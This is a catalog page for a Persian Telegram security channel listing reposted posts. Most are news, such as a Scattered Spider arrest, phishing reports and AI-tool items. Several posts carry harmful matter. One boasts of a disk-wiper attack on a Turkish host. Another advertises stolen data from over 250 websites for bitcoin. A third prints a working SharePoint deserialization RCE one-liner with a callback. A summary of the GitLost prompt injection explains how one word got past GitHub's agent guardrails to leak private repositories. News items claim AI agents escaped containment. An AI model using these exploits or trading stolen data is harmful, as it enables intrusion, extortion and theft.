tgindex
CyberSecurity
@matitaniumперсидский

Welcome to dark hell ‌ ما از دانش خود برای مهندسی دنیایی امن ‌تر استفاده می‌کنیم 🔐

Последний пост
3 авг.
Последнее чтение
15 авг.
Постов за неделю
0
Всего постов
23
Тип
открытый
Язык
персидский
В каталоге с
13 авг.
Подписчики
907
0 за 1 дн.
Сутки
0
0,00%
Неделя
 
Месяц
 
Просмотров на пост
354
23 постов
Вовлечённость
39,0%
к подписчикам
Постов в день
0,0
всего 23
Упоминаний
0
каналов
Охват размещения
оценка
1/24сутки в ленте
288
1/48двое суток
330
1/72трое суток
355

Оценка по просмотрам недавних постов: пост набирает почти всё за первые сутки.

Посты

  • 3 авг.12141из APTIRAN_OFFICIAL

    Wiper attack on firewall hosted on Yesilbeyaz Hosting (Turkey) full disk wiper attack was executed with root access, zeroing out the first 1GB of the disk including GPT, bootloader, and ZFS structures. The server is now completely dead and will never boot again. The entire system and all data are wiped.

  • 3 авг.14821из APTIRAN_OFFICIAL

    فروش عمده اطلاعات سرور و مشتریان این هاستینگ : اطلاعات بیش از 250 وب سایت + اطلاعات مشتریان این وب سایت ها (مردم و شرکت ها) اطلاعات سرور ها و کانفیگ ها در مجموع و به طور خلاصه : 5.52GB از کشور ترکیه + شرکای خصوصی و تجازی قیمت کل دیتابیس به صورت عمده : 7,500$ پرداخت از طریق : BTC برای خرید با ما در ارتباط باشید : https://t.me/+525638176691

  • 2 авг.151413из Secur1tyInternals

    یه تارگت بود داشتم تست میکردم و نیاز به بایپس waf داشت و این یکی akamai بود اگر خواستید برای xss بایپس کنید همچین وف هایی رو باید دنبال راههای alternative باشید تو این نوشن یه روش استفاده از dom clobbering رو براتون گفتم و یک اسکریپت هم توش هست برای پیدا کردن alternative برای کلمه window و document داشته باشید به درد میخوره https://cherry-event-b75.notion.site/DOM-Clobbering-WAF-Bypass-3af4f6d7dcce80fe919dcc27223a249e?source=copy_link

  • 23 июл.33232из ITSecurityComputer

    یک عامل هوش مصنوعی از کنترل خارج شد 🔹اوپن‌ای‌آی اعلام کرد که در یک آزمایش امنیتی، یک عامل خودمختار مبتنی بر مدل‌های پیشرفته این شرکت از محیط کنترل‌شده خارج شده و به اینترنت دسترسی پیدا کرده است. این عامل برای انجام مأموریت تعریف‌شده، زیرساخت‌های‌هاگینگ‌فیس را هدف یک حمله سایبری قرار داد. این رخداد بار دیگر نگرانی‌ها درباره مخاطرات امنیتی هوش مصنوعی پیشرفته را افزایش داده است. @ITSecurityComputer

  • 22 июл.32516из R0ot

    видео или голосовое, без подписи

  • 22 июл.32716из R0ot

    видео или голосовое, без подписи

  • 22 июл.32916из R0ot

    видео или голосовое, без подписи

  • وزارت دادگستری امریکا با همکاری FBI و اداره ملی تحقیقات فنلاند، Peter Stokes، یکی از هکرهای گروه هکری بزرگ Scattered Spider رو با همکاری مایکروسافت دستگیر کردن! گروه Scattered Spider یکی از گروه های هکری معروفی هست که طی سالهای اخیر به شرکتهای MGM، ردیت، DoorDash، Riot Games، MailChimp و غیره نفوذ کرده و از اونها بیش از 100 میلیون دلار باج گرفته! یکی از هکهای اخیر اونها هک شرکت جواهرسازی Tiffany بود که از اونها 8 میلیون دلار باج خواستن ولی این شرکت باج رو نداد اما کماکان به خاطر اسیب های عملیاتی که بهش وارد شد 2 میلیون دلار از این هک ضرر کرد. نکته عجیب در مورد بازداشت Peter Stokes که در حال حاضر 19 سالشه، همکاری عجیب مایکروسافت با FBI بوده که زنگ خطر بزرگی رو برای حریم شخصی کاربران ویندوزی به صدا دراورده. طبق اسناد دادگاه، FBI از طریق Global Device ID یا GDID لپتاپ این هکر، موفق شده ردپای این هکر رو در سرویسهای مختلف بهم وصل کنه و حتی استفاده از پروکسی و VPN هم تاثیری در مخفی کردن این هکر نداشته. شناسه GDID شناسه ای در دستگاه های ویندوزی هست که فقط با تعویض ویندوز یا تغییر سخت افزاری بزرگ (مثل تعویض مادربورد) تغییر میکنه و مثلا مایکروسافت برای فعالسازی ویندوز از اون استفاده میکنه. ولی طبق اسناد منتشر شده از دادگاه این هکر، مایکروسافت داده هایی داشته که میدونسته GDID دستگاه این هکر در چه زمانهایی، از چه سایتهایی بازدید کرده و با چه IPهایی متصل میشده. از جمله نمونه اونها این هست که مایکروسافت به FBI اطلاعاتی ارائه داده که نشون میده اکانتی با شناسه خاصی از نرم افزار ngrok برای تونل کردن کامپیوتر خودش به کامپیوتر یکی از شرکتهای قربانی استفاده کرده، این GDID در زمان خاصی با IP خاصی در تایلند بوده که این هکر با اون IP در اسنپ چت عکسهای خاصی منتشر کرده. یا مثلا این GDID در زمان خاصی با ایپی استونی (که ظاهرا خونه اش بوده) بازی Growtopia رو بازی کرده. در مثال دیگری این GDID وارد سایت Empire Hotel شده، که با تطبیق اون با زمان عکسهایی که این هکر در اسنپ چتش از این هتل منتشر کرده و همچنین در اون زمان با ایپی خاصی به اکانت اپلش دسترسی داشته، FBI با دقت بالایی موفق شده بفهمه که این شخص همون هکر Scattered Spider بوده. چنین سطح گسترده از اطلاعاتی که ویندوز به سرورهای مایکروسافت میفرسته، کاربران رو بیش از پیش مجاب کرده که حداقل برای کارهای حساسشون فقط از سیستم عاملهای مبتنی بر لینوکس استفاده کنن چون حتی دستگاه های اپل هم کمابیش ایپی کاربر رو به سرورهای این شرکت میفرستن. @ITSecurityComputer

  • 21 июл.309110из Secur1tyInternals

    این کد poc مربوط به rce جدید sharepoint که deserial هست $n=[Guid]::NewGuid().ToString('N');$cb="http://remote/spse-cookie-rce-$n";$tmp="$env:TEMP\$n.bin";$cmd="powershell.exe -NoProfile -NonInteractive -Command Invoke-WebRequest -UseBasicParsing '$cb'";& 'ysoserial.exe' -g TypeConfuseDelegate -f BinaryFormatter -o raw -c $cmd --outputpath $tmp|Out-Null;Add-Type -AssemblyName System.IdentityModel;$raw=[IO.File]::ReadAllBytes($tmp);$cookie=[Convert]::ToBase64String(([System.IdentityModel.DeflateCookieTransform]::new()).Encode($raw));$token="<sc:SecurityContextToken xmlns:sc='http://schemas.xmlsoap.org/ws/2005/02/sc'><sc:Identifier>urn:unique-id:securitycontext:$n</sc:Identifier><Cookie xmlns='http://schemas.microsoft.com/ws/2006/05/security'>$cookie</Cookie></sc:SecurityContextToken>";$rstr="<t:RequestSecurityTokenResponse xmlns:t='http://schemas.xmlsoap.org/ws/2005/02/trust'><t:RequestedSecurityToken>$token</t:RequestedSecurityToken></t:RequestSecurityTokenResponse>";Write-Host "Callback: $cb";try{Invoke-WebRequest 'http://TARGET/_trust/default.aspx' -Method Post -Proxy 'http://127.0.0.1:8080' -ContentType 'application/x-www-form-urlencoded' -Body @{wa='wsignin1.0';wctx='http://TARGET/';wresult=$rstr} -UseBasicParsing -TimeoutSec 60}finally{Remove-Item $tmp -Force -ErrorAction SilentlyContinue} https://x.com/testanull/status/2079082982640668990

  • 8 июл.41944из intsec

    نشت مخفیانه‌ی دیتا از ریپازیتوری‌های پرایوت گیت‌هاب با یه ترفند ساده‌ی هوش مصنوعی 📚 فکر کنید یه نفر بدون هیچ پسورد و دسترسی‌ای، بتونه کدهای مخفیانه‌تون رو توی گیت‌هاب بخونه. چطوری؟ با گول زدن ایجنت هوش مصنوعیِ خود گیت‌هاب! تیم Noma Labs یه آسیب‌پذیری خیلی خطرناک (به اسم GitLost) توی سیستم جدید Agentic Workflows گیت‌هاب پیدا کرده. داستان از این قراره که این ایجنت‌ها می‌تونن issueها رو بخونن و اتوماسیون انجام بدن. حالا هکرها چیکار می‌تونن بکنن؟ هکر کافیه بیاد تو یکی از ریپازیتوری‌های پابلیک شما یه Issue باز کنه و توش یه سری دستور مخفیانه به زبان انگلیسی (Prompt Injection) قایم کنه. ایجنت گیت‌هاب این متن رو می‌خونه، گول می‌خوره و به جای کار اصلیش، میره فایل‌ها و دیتای ریپازیتوری‌های پرایوتِ همون سازمان رو می‌خونه و برای هکر می‌فرسته! نکته‌ی جالب اینجاست: گیت‌هاب کلی گاردریل امنیتی چیده بود که دقیقاً جلوی همین اتفاق رو بگیره. اما محقق‌ها فهمیدن فقط با اضافه کردن کلمه‌ی "Additionally" (به‌علاوه/همچنین) توی پرامپت هک، مدل هوش مصنوعی کلا گیج می‌شه و به جای اینکه درخواست رو رد کنه، تمام محدودیت‌ها رو دور می‌زنه و دیتا رو لو میده. این دقیقاً نشون میده که توی سیستم‌های جدید هوش مصنوعی، همون متنی که ایجنت می‌خونه همزمان می‌تونه پاشنه آشیل و نقطه حمله باشه. حملات Prompt Injection الان دقیقاً دارن همون بلایی رو سر AI میارن که قبلاً SQL Injection سر وب‌سایت‌ها میاورد. البته این باگ به طور مسئولانه به گیت‌هاب گزارش شده، ولی حواستون به ایجنت‌هایی که به سورس‌کدهاتون دسترسی دارن باشه! 🔗 https://noma.security/blog/gitlost-how-we-tricked-githubs-ai-agent-into-leaking-private-repos ✅ Channel 💬 Group

  • 8 июл.370из HackerNewscyber

    ✈️موج جدید «فیشینگ شبح» سامانه‌های امنیت ایمیل را دور می‌زند 🎥پژوهشگران امنیت سایبری از شناسایی موج جدیدی از حملات موسوم به Ghost Phishing خبر داده‌اند که با استفاده از کیت EvilTokens، سازمان‌ها و شرکت‌ها در آمریکا و اروپا را هدف قرار داده است. در این روش، محتوای صفحه فیشینگ به‌صورت رمزگذاری‌شده ارسال شده و تنها پس از باز شدن در مرورگر قربانی رمزگشایی می‌شود؛ موضوعی که باعث می‌شود بسیاری از سامانه‌های سنتی امنیت ایمیل و بررسی لینک‌ها قادر به شناسایی آن نباشند. 🎤این حملات با سوءاستفاده از قابلیت Microsoft Device Code، کاربران را به ورود قانونی به حساب Microsoft 365 ترغیب کرده و بدون سرقت مستقیم رمز عبور، امکان دسترسی مهاجمان به ایمیل‌ها، فایل‌ها و سرویس‌های ابری را فراهم می‌کنند. کارشناسان هشدار داده‌اند که برای مقابله با این تهدید، سازمان‌ها باید علاوه بر بررسی لینک‌ها، از ابزارهای تحلیل رفتار مرورگر و محیط‌های ایزوله (Sandbox) برای شناسایی صفحات فیشینگ پیشرفته استفاده کنند. ✈️@HackerNewsCyber

  • 7 июл.3041из GOTOCVE

    https://research.checkpoint.com/2026/cavern-manticore-exposing-iran-linked-modular-c2-framework/

  • https://www.youtube.com/watch?v=C5JsBCUzbzk

  • 6 июл.27815из GOTOCVE

    https://xssnow.in/payloads.html

  • 3 июл.47273из Kaliboys

    ✔️ چین با ZCode وارد رقابت جدی در ابزارهای هوش مصنوعی برنامه‌نویسی شد شرکت Z.ai از محیط توسعه هوشمند ZCode رونمایی کرد؛ یک IDE ایجنت‌محور که با مدل متن‌باز GLM-5.2 یکپارچه شده و رقیبی برای ابزارهایی مانند Cursor، Claude Code و GitHub Copilot محسوب می‌شود. محیط ZCode برای ویندوز، macOS و لینوکس منتشر شده و امکاناتی مانند برنامه‌ریزی، کدنویسی، تست، بازبینی کد و اجرای وظایف چندمرحله‌ای را در اختیار توسعه‌دهندگان قرار می‌دهد. یکی از قابلیت‌های جالب این ابزار، کنترل Agent از طریق تلگرام، وی‌چت و Feishu است؛ به‌طوری‌که می‌توان حتی از طریق موبایل روند اجرای پروژه را مشاهده و دستورات جدید ارسال کرد. نکته قابل‌توجه اینکه Z.ai تلاش کرده وابستگی خود را به زیرساخت‌های غربی کاهش دهد. مدل GLM-5.2 از سخت‌افزارهای داخلی چین از جمله Huawei Ascend پشتیبانی می‌کند و هم‌زمان با افزایش محدودیت‌های آمریکا علیه برخی مدل‌های هوش مصنوعی، به یکی از جدی‌ترین گزینه‌های متن‌باز برای برنامه‌نویسی تبدیل شده است. @kaliboys | کالی بویز

  • بعد از کار با این سبک مدل ها: بنظرم روی پرامپت نویسی یه ریسرچ خوب داشته باشید. چرا؟ چون مهندسی پرامپت داستان عمیقی داره بخصوص توی حوزه امنیت شما دقیق باید مدل رو راهنمایی کنید تا بهترین ریزالت رو بده بهتون مثلا نحوه استفاده ماژولار از پرامپت ها استفاده بهینه و تو در تو یا تعریف ساب ایجنت ها منظور نهایی: برای پیاده سازی چیز دقیقی که تویه ذهنتون هست باید زبان دقیق مدل هارو بلد باشید

  • کراش زدم رو claude

  • https://gizmodo.com/anthropics-mythos-ai-reportedly-hacked-the-nsas-most-sensitive-systems-in-hours-2000776836 سرور های NSA هم از claude بی نصیب نمونده!

  • https://gizmodo.com/anthropics-mythos-ai-reportedly-hacked-the-nsas-most-sensitive-systems-in-hours-2000776836 سرور های NSA هم از claude بی نصیب نمونده!

  • 30 июн.7711920

    هکروان هم هک شد اطلاعات پرسنلش لیک شد شرکت ترد پارتی مسئول ذخیره اطلاعات پرسنلش مورد نفوذ قرار گرفته

CyberSecurity — tgindex